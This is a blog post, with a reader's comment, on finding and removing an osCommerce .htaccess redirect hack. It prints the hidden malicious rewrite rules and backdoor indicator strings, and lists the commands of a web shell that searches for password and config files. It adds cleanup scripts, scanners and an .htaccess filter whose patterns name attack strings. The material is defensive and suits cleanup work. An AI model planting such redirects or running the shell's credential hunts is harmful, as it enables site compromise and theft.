
Another Update on the osCommerce .htaccess Hack

   18 Jan 11   Filed in Website exploits

The osCommerce .htaccess hack that I wrote about here and here is still quite prevalent.

Some webmasters have problems locating the rogue .htaccess files so I decided to address this issue again.

1. The malicious redirect rules. Here is the code that you should find and remove from your .htaccess files:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ hxxp://drevingjp .tk/in.cgi?4 [R=301,L]

2. The last line of this code may change every day — hackers regularly update the redirect target domain.

3. Whitespace. To hide this relatively big piece of code, hackers insert a few screens of whitespace before it. You should scroll down to find it.

Moreover, there is a new modification of this trick: there may also be several screens of whitespace after the code, so that if you scroll the file all the way down, you won’t see the malicious redirect rules either. Plus, they add 120 whitespace characters to the left of the code and 120 characters to the right of the code. As a result, the malicious code will be outside of the visible area in almost any text viewer/editor even if you slowly scroll the file vertically and horizontally.

For example, I have a real .htaccess file that looks empty but is 3951 bytes in size. It has 134 “empty” lines. The position of the first character of the topmost redirect rule is (line: 49, column: 121) and the position of the last character of the last rule is (line: 84, column: 177). Each rule has 100+ trailing whitespace characters, up to column 281.
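Because the padding trick defeats eyeballing the file, a small script that ignores whitespace and reports where every Rewrite* directive actually sits is the reliable check. The following Python scanner is an added example, not code from the original post: it reports the 1-based line and column of each directive, counts the blank lines before and after the block, and flags the referer-conditional off-site redirect pattern described above. The sample file built by build_sample() is constructed to match the layout in the post (rules starting at line 49, column 121); the redirect target in it is a placeholder, not a real domain.

```python
"""Find rewrite rules hidden by whitespace padding in an .htaccess file."""
import re
import sys

REWRITE_RE = re.compile(r"^\s*(RewriteEngine|RewriteCond|RewriteRule)\b")
REFERER_RE = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}", re.I)
EXTERNAL_TARGET_RE = re.compile(r"RewriteRule\s+\S+\s+(https?://\S+)", re.I)


def find_directives(text):
    """Return (line, first_col, last_col, directive) for every Rewrite* line.

    Columns are 1-based positions of the first and last non-blank character,
    so a rule pushed to column 121 by left padding is reported as such.
    """
    hits = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        if not REWRITE_RE.match(raw):
            continue
        directive = raw.strip()
        first_col = len(raw) - len(raw.lstrip()) + 1
        hits.append((lineno, first_col, first_col + len(directive) - 1, directive))
    return hits


def _count_blank_edge(lines):
    """Number of consecutive all-whitespace lines at the start of `lines`."""
    count = 0
    for line in lines:
        if line.strip():
            break
        count += 1
    return count


def analyze(text):
    """Summarise padding tricks and redirect behaviour found in the file text."""
    lines = text.splitlines()
    directives = find_directives(text)
    report = {
        "total_lines": len(lines),
        "directives": len(directives),
        "leading_blank_lines": _count_blank_edge(lines),
        "trailing_blank_lines": _count_blank_edge(list(reversed(lines))),
        "min_first_col": min((d[1] for d in directives), default=0),
        "referer_conditions": sum(1 for d in directives if REFERER_RE.search(d[3])),
        "external_targets": [m.group(1) for d in directives
                             for m in [EXTERNAL_TARGET_RE.search(d[3])] if m],
    }
    # Heuristics: rules buried behind a screen of blank lines or pushed past the
    # right edge of a typical editor, and a referer-gated redirect off-site.
    report["hidden_by_padding"] = bool(directives) and (
        report["leading_blank_lines"] >= 20 or report["min_first_col"] > 80)
    report["referer_redirect"] = (
        report["referer_conditions"] > 0 and bool(report["external_targets"]))
    return report


def build_sample():
    """Constructed .htaccess text laid out as the post describes: 48 blank lines,
    then rules padded with 120 spaces on each side, then 49 more blank lines."""
    rules = [
        "RewriteEngine On",
        "RewriteCond %{HTTP_REFERER} .*google.* [OR]",
        "RewriteCond %{HTTP_REFERER} .*bing.*",
        "RewriteRule ^(.*)$ http://redirect-target.invalid/in.cgi?4 [R=301,L]",
    ]
    pad = " " * 120
    return "\n" * 48 + "\n".join(pad + r + pad for r in rules) + "\n" * 50


if __name__ == "__main__":
    # Usage: python htaccess_scan.py /path/to/.htaccess  (no argument: scan the sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="latin-1") as fh:
            text = fh.read()
    else:
        text = build_sample()
    for line, c1, c2, directive in find_directives(text):
        print(f"line {line} cols {c1}-{c2}: {directive}")
    print(analyze(text))
```

Run it against a downloaded copy of each .htaccess (site root and the directory above it); a file whose report shows dozens of leading blank lines or a first column past 80 has been padded on purpose, and a non-zero referer_conditions count together with an external target is the redirect block itself.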

4. Location. The tampered .htaccess file can usually be found in the site root directory and in the directory above the site root.

5. Above the site root directory … Some hosting providers configure FTP access so that webmasters can’t open anything above the site root. This restriction only works against less experienced webmasters, who could accidentally shoot themselves in the foot if they had access to all their directories. Unfortunately, it can’t stop hackers from accessing and writing to user directories above the site root using simple PHP scripts. As a result, webmasters can’t see or delete rogue .htaccess files in their own directories!

Here’s a simple PHP code that can show your files in the directory above your site root:

<?php
// List the directory above the site root: name : permissions : owner uid : mtime
$adir = "..";
$handle = opendir($adir);
if ($handle === false) {
    die("Cannot open $adir");
}
while (($file = readdir($handle)) !== false) {
    $fpath = "$adir/$file";
    $n = fileowner($fpath);                            // numeric uid of the owner
    $d = date("F d Y H:i:s.", filemtime($fpath));      // last modification time
    echo "$file : ";
    echo substr(sprintf("%o", fileperms($fpath)), -4); // e.g. 0644
    echo " : $n : $d";
    echo "<br />";
}
closedir($handle);
?>

Just create a .php file (e.g. uplist.php) with the above content and upload it to the root directory of your site. Then open it in your web browser (e.g. http://www.your-site-domain.com/uplist.php). It should show directories, files, their owners, permissions and dates. This way you’ll be able to check whether there’s a .htaccess file above your site root directory.

If it is there, you can delete it using another simple .php script.

<?php
// Remove the rogue .htaccess one level above the site root.
$filename = '../.htaccess';
if (unlink($filename)) { echo "Deleted $filename"; }
else { echo "Could not delete $filename"; }
?>

Again, place the file in the root directory (important!) and open it in a web browser. That’s it.

Don’t forget to delete these .php files when done (they may be abused).

6. Admin interface redirects. In some cases I noticed that files in the /admin directory also redirect to the same malicious sites. In this case the redirect is not conditional: it occurs even if I don’t have a search engine as a referrer. Sometimes only individual files in the admin directory are affected (e.g. file_manager.php). Most likely some .php code has been injected into those files (let me know if you know more about this redirect). When you clean up your sites, make sure to check files in the admin directory for integrity.
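Checking the admin directory “for integrity” is much easier if you have something to compare against. The Python script below is an added example, not code from the original post: it records SHA-256 digests of every file in a known-good copy of the directory (a fresh install or a clean backup), then diffs the live directory against that record so that an altered file_manager.php and a newly dropped file both show up by name. The admin tree built by demo() is constructed for the demonstration; the redirect URL and hostname in it are placeholders, not real domains.

```python
"""Baseline-and-compare integrity check for a directory such as osCommerce's admin/."""
import hashlib
import json
import os
import shutil
import tempfile


def hash_tree(root):
    """Map each regular file under root (relative POSIX path) to its SHA-256 hex digest."""
    digests = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if not os.path.isfile(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


def save_baseline(digests, path):
    """Write the digest map as JSON; keep this file outside the web root."""
    with open(path, "w") as fh:
        json.dump(digests, fh, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as fh:
        return json.load(fh)


def compare(baseline, current):
    """Return the relative paths that were added, removed or modified since the baseline."""
    base_keys, cur_keys = set(baseline), set(current)
    return {
        "added": sorted(cur_keys - base_keys),
        "removed": sorted(base_keys - cur_keys),
        "modified": sorted(p for p in base_keys & cur_keys if baseline[p] != current[p]),
    }


def demo():
    """Constructed scenario: baseline a clean admin/ tree, then simulate the two
    changes the post describes (an altered file_manager.php and a dropped
    verification-file look-alike) and report the diff."""
    root = tempfile.mkdtemp()
    try:
        admin = os.path.join(root, "admin")
        os.makedirs(os.path.join(admin, "includes"))
        clean = {
            "file_manager.php": "<?php // constructed stand-in for the admin file manager ?>\n",
            "includes/configure.php": "<?php define('HTTP_SERVER', 'http://shop.example'); ?>\n",
        }
        for rel, body in clean.items():
            with open(os.path.join(admin, rel), "w") as fh:
                fh.write(body)
        baseline_path = os.path.join(root, "admin-baseline.json")
        save_baseline(hash_tree(admin), baseline_path)

        # Simulated compromise (constructed): injected redirect and a dropped file.
        with open(os.path.join(admin, "file_manager.php"), "a") as fh:
            fh.write("<?php header('Location: http://redirect-target.invalid/'); ?>\n")
        with open(os.path.join(admin, "google24b97876256ad178.php"), "w") as fh:
            fh.write("<?php /* constructed stand-in for a dropped backdoor */ ?>\n")

        return compare(load_baseline(baseline_path), hash_tree(admin))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Take the baseline from a copy you trust (never from the possibly-infected live site), store the JSON off the web server, and re-run the comparison after every cleanup; anything under “added” in admin/ deserves the same scrutiny as the backdoor file names discussed further down.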

7. Backdoor files. Many webmasters of infected sites report that they find backdoor files on their servers.

Make sure to search for suspicious files and directories. Usually backdoor files contain strings like

eval(gzuncompress(base64_decode(…
eval(base64_decode(…
edoced_46esab

gzinflate(

Many infected osCommerce sites have backdoors with filenames that resemble Google’s Webmaster Tools verification files, only with the .php extension, e.g. google24b97876256ad178.php. These files usually contain a so-called “Web Shell by boff” that hackers use to work with files on compromised servers.
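The indicator strings and the verification-file look-alike names above are easy to turn into a triage scan. The Python script below is an added example, not code from the original post: it walks a web root, reads PHP-like files, and reports which of the quoted obfuscation strings (eval(base64_decode(, eval(gzuncompress(base64_decode(, gzinflate(, and the reversed edoced_46esab) each file contains, plus any file named like a Google verification file but ending in .php. The web root scanned by demo() is constructed in a temporary directory and its file contents are stand-ins, not real malware.

```python
"""Triage scan for the backdoor indicators listed in the post."""
import os
import re
import shutil
import sys
import tempfile

CONTENT_INDICATORS = [
    ("eval-base64_decode", re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)),
    ("eval-gzuncompress-base64_decode",
     re.compile(r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(", re.I)),
    ("gzinflate", re.compile(r"gzinflate\s*\(", re.I)),
    ("reversed-base64_decode", re.compile(r"edoced_46esab", re.I)),
]
# Real verification files are google<16 hex digits>.html; the .php twin is the red flag.
VERIFICATION_LOOKALIKE = re.compile(r"^google[0-9a-f]{16}\.php$", re.I)
PHP_EXTENSIONS = (".php", ".php5", ".phtml", ".inc")


def scan_file(path):
    """Return the indicator names that apply to one file (empty list if none)."""
    with open(path, "rb") as fh:
        text = fh.read().decode("latin-1")   # never fails on arbitrary bytes
    found = [name for name, rx in CONTENT_INDICATORS if rx.search(text)]
    if VERIFICATION_LOOKALIKE.match(os.path.basename(path)):
        found.append("verification-lookalike-name")
    return found


def scan_tree(root):
    """Map relative path -> indicators for every PHP-like file that triggers at least one."""
    hits = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            found = scan_file(full)
            if found:
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = found
    return hits


def demo():
    """Constructed web root: two clean files, one legitimate verification .html,
    and two stand-ins for dropped backdoors."""
    root = tempfile.mkdtemp()
    try:
        files = {
            "index.php": "<?php require('includes/application_top.php'); ?>\n",
            "includes/application_top.php": "<?php session_start(); ?>\n",
            "google24b97876256ad178.html": "google-site-verification: constructed\n",
            "images/google24b97876256ad178.php":
                "<?php eval(gzuncompress(base64_decode('constructed'))); ?>\n",
            "cache/sess.php":
                "<?php $f = strrev('edoced_46esab'); eval(gzinflate($f('constructed'))); ?>\n",
        }
        for rel, body in files.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(body)
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    # Usage: python backdoor_scan.py /path/to/webroot  (no argument: scan the sample)
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for path, names in sorted(results.items()):
        print(f"{path}: {', '.join(names)}")
```

Treat the output as a list to review, not a verdict: gzinflate( and base64_decode( also appear in some legitimate bundled libraries, so open each hit and compare it with a clean copy of the same file before deleting anything; files that match the verification-lookalike name, on the other hand, have no legitimate reason to exist as .php.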

You can get an idea of what hackers can do with this shell from the list of its built-in shortcut commands:

"List dir"
"list file attributes on a Linux second extended file system"
"show opened ports"
"process status"
"find all suid files"
"find suid files in current dir"
"find all sgid files"
"find sgid files in current dir"
"find config.inc.php files"
"find config* files"
"find config* files in current dir"
"find all writable folders and files"
"find all writable folders and files in current dir"
"find all service.pwd files"
"find service.pwd files in current dir"
"find all .htpasswd files"
"find .htpasswd files in current dir"
"find all .bash_history files"
"find .bash_history files in current dir"
"find all .fetchmailrc files"
"find .fetchmailrc files in current dir"
"locate httpd.conf files"
"locate vhosts.conf files"
"locate proftpd.conf files"
"locate psybnc.conf files"
"locate my.conf files"
"locate admin.php files"
"locate cfg.php files"
"locate conf.php files"
"locate config.dat files"
"locate config.php files"
"locate config.inc files"
"locate config.inc.php"
"locate config.default.php files"
"locate config* files "
"locate .conf files"
"locate .pwd files"
"locate .sql files"
"locate .htpasswd files"
"locate .bash_history files"
"locate .mysql_history files"
"locate .fetchmailrc files"
"locate backup files"
"locate dump files"
"locate priv files"

Windows servers can also provide interesting information to hackers:

"List Directory"
"Find index.php in current dir"
"Find *config*.php in current dir"
"Show active connections"
"Show running services"
"User accounts"
"Show computers"
"ARP Table"
"IP Configuration"

If hackers use vulnerabilities in PHP files to create backdoors (in the case of osCommerce it’s usually file_manager.php), then the backdoors will have the same permissions as the site owner. This means that they can overwrite read-only files, create directories and change file permissions. So changing the .htaccess permissions to 444 (read-only for all) won’t protect it from modification if hackers use backdoor files. That’s why it is very important to find and delete all backdoor files. Otherwise, the infection can return.

8. Hardening osCommerce. Once again, I suggest that you read the following pages:

http://forums.oscommerce.com/topic/313323-how-to-secure-your-site/
http://blog.sucuri.net/2010/11/continuing-attacks-against-oscommerce-sites.html

They’ll help you harden osCommerce (and CRE Loaded) sites.

9. If you want to add some more facts about this osCommerce hack, please use the comments section below.


Reader's Comments (2)

  1.

    A hacker using IP 109.206.183.48 today added similar rewrite conditions to .htaccess with the following rewrite rule:
    RewriteRule .* hxxp://kelleytexas .com/images/hurricane/kee.php [R,L]

  2.

    Try this one


    ########## Hardcore Security for osCommerce HTACCESS v1.0.1 ###########
    ########## AUTHOR: TE TAIPO - rohepotae@gmail.com ###########
    ## See readme.txt for instructions ###########

    Options +SymLinksIfOwnerMatch

    # disable the server signature
    ServerSignature off

    # set the server administrator email
    SetEnv SERVER_ADMIN default@yourdomain.com

    # ~~~~ START OF FILTERING ~~~~~ #

    # secure htaccess and other files

    Order Allow,Deny
    Deny from all

    # add whatever configuration files here that are hosted on your server
    # that you want blocked

    Order allow,deny
    Deny from all

    # disable access to the osCommerce config.php

    deny from all

    # disable access to the osCommercce admin config.php

    deny from all

    RewriteEngine On
    RewriteBase /

    # server request method
    RewriteCond %{REQUEST_METHOD} !^(GET|POST|HEAD|OPTIONS) [OR]

    # osCommerce 2.2x
    RewriteCond %{THE_REQUEST} ^.*\.php/login\.php.*$ [NC,OR]
    RewriteCond %{THE_REQUEST} ^.*login.php\?action\=backupnow.*$ [NC,OR]

    # _REQUEST
    RewriteCond %{THE_REQUEST} \?\ HTTP/1. [NC,OR]
    RewriteCond %{THE_REQUEST} \/\*\ HTTP/1. [NC,OR]
    RewriteCond %{THE_REQUEST} %20HTTP/1. [NC,OR]
    RewriteCond %{THE_REQUEST} cgi-bin [NC,OR]
    RewriteCond %{THE_REQUEST} (showimg=|cookies=|passwd) [NC,OR]
    RewriteCond %{QUERY_STRING} (file_get_contents\(|setcookie\() [NC,OR]
    RewriteCond %{QUERY_STRING} (\,0x3a\,|unescape\(|fromcharcode|pwtoken_get|php_uname|passthru\() [NC,OR]
    RewriteCond %{QUERY_STRING} (eval\%28|eval\%2528|eval\(|base64_(en|de)code[^(]*\([^)]*\)|base64_encode.*\(.*\)) [NC,OR]
    RewriteCond %{QUERY_STRING} (JHs\=|replace\(|return\%20clk|boot\.ini|php\/password_for|announce\?info_hash) [NC,OR]
    RewriteCond %{QUERY_STRING} (\_START\_|\=alert\(|mysql\_query|\.\.\/cmd|rush\=|EXTRACTVALUE\(|phpinfo\() [NC,OR]
    RewriteCond %{QUERY_STRING} (\/frameset|\$\_SESSION|\$\_REQUEST|\$HTTP\_|mosConfig\_|inurl\:|\/iframe|onload\=) [NC,OR]
    RewriteCond %{THE_REQUEST} (allow_url_fopen|\%23include\+\<|get_defined_vars\(|\%22\'\%2f|error_reporting\(0\)) [NC,OR]
    RewriteCond %{THE_REQUEST} (fwrite\(|waitfor\%20delay|shell_exec|gzinflate\(|prompt\(|php_value\%20auto) [NC,OR]
    RewriteCond %{THE_REQUEST} (onmouseover|onmousedown|ct\(this) [NC,OR]
    RewriteCond %{THE_REQUEST} (ftp\:\/\/|1\=1\-\-|current\_user\(\)|\%3Cform|sha1\(|self\/environ) [NC,OR]
    RewriteCond %{THE_REQUEST} (\<\%3Fphp|\%\%|1\+and\+1|\/iframe|\$\_GET|document\.cookie|onload\%3d|onunload\%3d) [NC,OR]
    RewriteCond %{THE_REQUEST} (\%00|hex\_ent|ob\_starting|PHP\_SELF|etc\/passwd|shell\_exec|data\:\/\/|\$\_SERVER|\$\_POST) [NC,OR]
    RewriteCond %{THE_REQUEST} (\%bf\%5c\%27|\%bf\%27|\%ef\%bb\%bf|\%8c\%5c|\%a3\%27) [NC,OR]
    RewriteCond %{THE_REQUEST} (\=0\^\() [NC,OR]
    RewriteCond %{THE_REQUEST} (\@\@datadir|\@\@version|version\(\)|localhost|\}\)\%3B|Set\-Cookie|\%253C\%2Fscript\%253E) [NC,OR]
    RewriteCond %{THE_REQUEST} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

    # http referer
    RewriteCond %{HTTP_REFERER} ('|%0A|%0D|%00) [NC,OR]

    # mysql related
    RewriteCond %{QUERY_STRING} (null\,null|outfile|load_file) [NC,OR]
    RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR]
    RewriteCond %{QUERY_STRING} (order).*(by).*(\%[0-9A-Z]{0,2}) [NC,OR]
    RewriteCond %{QUERY_STRING} (waitfor|delay|shutdown).*(nowait) [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(ascii\(|bin\(|benchmark\(|cast\(|char\(|charset\(|collation\(|concat\(|concat_ws\(|table_schema) [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(conv\(|convert\(|count\(|database\(|decode\(|diff\(|distinct\(|elt\(|encode\(|encrypt\() [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(extract\(|field\(|floor\(|format\(|hex\(|if\(|in\(|information_schema|insert\(|instr\(|interval\(|lcase\() [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(left\(|length\(|load_file\(|locate\(|lock\(|log\(|lower\(|lpad\(|ltrim\(|max\(|md5\(|mid\() [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(mod\(|now\(|null\(|ord\(|password\(|position\(|quote\(|rand\(|repeat\(|replace\(|reverse\() [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(right\(|rlike\(|row_count\(|rpad\(|rtrim\(|_set\(|schema\(|sha1\(|sha2\(|sleep\(|soundex\() [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(space\(|strcmp\(|substr\(|substr_index\(|substring\(|sum\(|time\(|trim\(|truncate\(|ucase\() [NC,OR]
    RewriteCond %{QUERY_STRING} (union|and|position).*(select).*(unhex\(|upper\(|_user\(|user\(|values\(|varchar\(|version\(|xor\() [NC,OR]

    # cookies
    RewriteCond %{HTTP_COOKIE} ('|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
    RewriteCond %{HTTP_COOKIE} (eval\%28|eval\%2528|eval\(|information_schema) [NC,OR]
    RewriteCond %{HTTP_COOKIE} (null\,null|outfile) [NC,OR]
    RewriteCond %{HTTP_COOKIE} union([^a]*a)+ll([^s]*s)+elect [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(ascii\(|bin\(|benchmark\(|cast\(|char\(|charset\(|collation\(|concat\(|concat_ws\(|table_schema) [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(conv\(|convert\(|count\(|database\(|decode\(|diff\(|distinct\(|elt\(|encode\(|encrypt\() [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(extract\(|field\(|floor\(|format\(|hex\(|if\(|in\(|information_schema|insert\(|instr\(|interval\(|lcase\() [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(left\(|length\(|load_file\(|locate\(|lock\(|log\(|lower\(|lpad\(|ltrim\(|max\(|md5\(|mid\() [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(mod\(|now\(|null\(|ord\(|password\(|position\(|quote\(|rand\(|repeat\(|replace\(|reverse\() [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(right\(|rlike\(|row_count\(|rpad\(|rtrim\(|_set\(|schema\(|sha1\(|sha2\(|sleep\(|soundex\() [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(space\(|strcmp\(|substr\(|substr_index\(|substring\(|sum\(|time\(|trim\(|truncate\(|ucase\() [NC,OR]
    RewriteCond %{HTTP_COOKIE} (union|and|position).*(select).*(unhex\(|upper\(|_user\(|user\(|values\(|varchar\(|version\(|xor\() [NC,OR]

    # LFI and session hijacking
    RewriteCond %{QUERY_STRING} \=(\.\./\.\.//?)+ [OR]
    RewriteCond %{QUERY_STRING} \=(\.\.//\./?)+ [OR]
    RewriteCond %{QUERY_STRING} \=(\.\.\\\.\./?)+ [OR]
    RewriteCond %{QUERY_STRING} \=(\.\.\\\\\./?)+ [OR]
    RewriteCond %{QUERY_STRING} \/tmp\/sess_ [NC,OR]
    RewriteCond %{QUERY_STRING} php:\/\/filter\/read=convert\.base64-(en|de)code\/ [NC,OR]

    # if expose_php is set to on
    RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC]

    RewriteRule ^(.*)$ - [F,L]

    # ~~~~ END OF FILTERING ~~~~~ #
    # OPTIONAL EXTRAS
    # Uncomment and use.
    # If Error 500 encountered then comment out

    # disable directory browsing, if error 500 encountered then comment out
    # Options All -Indexes

    # prevent folder listing, if error 500 encountered then comment out
    # IndexIgnore *

    # php_value session.use_trans_sid 0

    # auto keep the config file read only
    # chmod configure.php files 444

    # turn off magic_quotes_gpc
    #
    # php_flag magic_quotes_gpc off
    #

    ########## End of Hardcore Security for osCommerce HTACCESS v1.0.1 #################